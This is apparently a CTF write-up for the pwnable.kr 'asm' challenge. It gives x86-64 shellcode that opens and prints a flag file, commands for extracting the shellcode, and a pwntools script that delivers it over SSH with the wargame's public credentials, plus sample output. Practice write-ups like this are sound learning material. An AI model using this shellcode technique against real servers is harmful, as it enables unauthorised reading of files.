History view

Pwning in Linux

ASM - Making your Own ASM Shellcode for open/read/write remote file on server

theFaunia in the wild 2019. 2. 28. 16:08

ASM

1.1 Generate Shellcode

naivenom@kali:/opt/shellme$ objdump -d ./test|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Compilar una shellcode en asm:

sudo nasm -f elf64 -o test.o test.asm
sudo ld -nostartfiles -nostdlib -z noexecstack -m elf_x86_64 -s -o test test.o

1.2 Writing your ASM Code

asm
BITS 64
global _start
;SHELLCODE DE CERO MIRANDO
;Linux System Call Table for x86 64 ;https://blog.rchapman.org/posts/Linux_Syste;m_Call_Table_for_x86_64/
_start:
    jmp filename
_open:
    pop rdi
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2; 0x2 sys_open
    syscall
;syscall read
    mov rdi, rax ;fd o return value de syscall anterior 
    mov rdx, 0x40 ;tamaño de bytes a leer el "count
    mov rsi, rsp ;el buffer
    xor rax, rax ;xorea y da 0x0 sys_read que necesitamos
    syscall
;syscall write stdout
    mov rdx, rax ;el valor de retorno de la anterior syscall que son los bytes leidos
    ;mov rsi, rsp recuperamos del stack la direccion de memoria del buffer que contiene el contenido del fichero
    mov rdi, 0x1 ;fd de write 0x1 --> STDOUT_FILENO
    mov rax, 0x1 ;0x1 sys_write
    syscall
    mov rax, 0x3c
    syscall
filename:
    call _open
    db "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong",0

1.3 PoC Local file

naivenom@kali:~/pwnable/asm$ cat this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong 
HOLAAA
naivenom@kali:~/pwnable/asm$ ./shellcode_final 
HOLAAA

1.4 Writing your ASM Code for pwning remote server

asm
bits 64
section .text
global _start
_start:
	xor rsi, rsi
	xor rdx, rdx
	push rsi
	mov rax, 0x676e6f306f306f30
	push rax
	mov rax, 0x6f306f306f306f30
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030306f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f303030303030
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030306f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6c
	push rax
	mov rax, 0x5f797265765f7369
	push rax
	mov rax, 0x5f656d616e5f656c
	push rax
	mov rax, 0x69665f6568745f79
	push rax
	mov rax, 0x72726f732e656c69
	push rax
	mov rax, 0x665f736968745f64
	push rax
	mov rax, 0x6165725f65736165
	push rax
	mov rax, 0x6c705f656c69665f
	push rax
	mov rax, 0x67616c665f726b2e
	push rax
	mov rax, 0x656c62616e77705f
	push rax
	mov rax, 0x73695f736968742f
	push rax
	mov rax, 0x2f2f2f2f2f2f2f2e    ; No NULLBYTE to open file like
	push rax
	mov rdi, rsp
	mov rax, 0x2
	syscall
	mov rbx, rax
	mov rdx, 0xc8 
	mov rsi, rdi
	mov rdi, rbx
	xor rax, rax
	syscall
	mov rdx, rax
	mov rsi, rsp
	mov rdi, 0x1
	mov rax, 0x1
	syscall

1.5 Exploit remote server

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.update(arch="amd64", os="linux", bits=64)
r = ssh(host="pwnable.kr", port=2222, user="asm", password="guest")
p = r.connect_remote("localhost", 9026)
shellcode = asm("""
	xor rsi, rsi
	xor rdx, rdx
	push rsi
	mov rax, 0x676e6f306f306f30
	push rax
	mov rax, 0x6f306f306f306f30
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030306f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f303030303030
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030303030303030
	push rax
	mov rax, 0x3030306f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6f
	push rax
	mov rax, 0x6f6f6f6f6f6f6f6c
	push rax
	mov rax, 0x5f797265765f7369
	push rax
	mov rax, 0x5f656d616e5f656c
	push rax
	mov rax, 0x69665f6568745f79
	push rax
	mov rax, 0x72726f732e656c69
	push rax
	mov rax, 0x665f736968745f64
	push rax
	mov rax, 0x6165725f65736165
	push rax
	mov rax, 0x6c705f656c69665f
	push rax
	mov rax, 0x67616c665f726b2e
	push rax
	mov rax, 0x656c62616e77705f
	push rax
	mov rax, 0x73695f736968742f
	push rax
	mov rax, 0x2f2f2f2f2f2f2f2e
	push rax
	mov rdi, rsp
	mov rax, 0x2 
	syscall
	mov rbx, rax
	mov rdx, 0xc8 
	mov rsi, rdi
	mov rdi, rbx
	xor rax, rax
	syscall
	mov rdx, rax
	mov rsi, rsp
	mov rdi, 0x1
	mov rax, 0x1
	syscall
""")
p.recvuntil("give me your x64 shellcode:")
p.send(shellcode)
p.interactive()
p.close()

1.6 PoC Remote Exploitation

naivenom@kali:~/pwnable/asm$ python exploit2.py 
[+] Connecting to pwnable.kr on port 2222: Done
[*] asm@pwnable.kr:
    Distro    Ubuntu 16.04
    OS:       linux
    Arch:     amd64
    Version:  4.10.0
    ASLR:     Enabled
[+] Connecting to localhost:9026 via SSH to pwnable.kr: Done
[*] Switching to interactive mode
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[*] Got EOF while reading in interactive
$

'Pwning in Linux' 카테고리의 다른 글

Exploit - GrownUp pwnable.xyz  (0) 2019.03.01
Trigger return NULL value in Malloc  (0) 2019.02.28
Brainfuck - GOT Dereferencing / Overwriting, ASLR/NX Bypass  (0) 2019.02.28
Basics Return-oriented programming  (0) 2019.02.28
Unlink  (0) 2019.02.28
Comments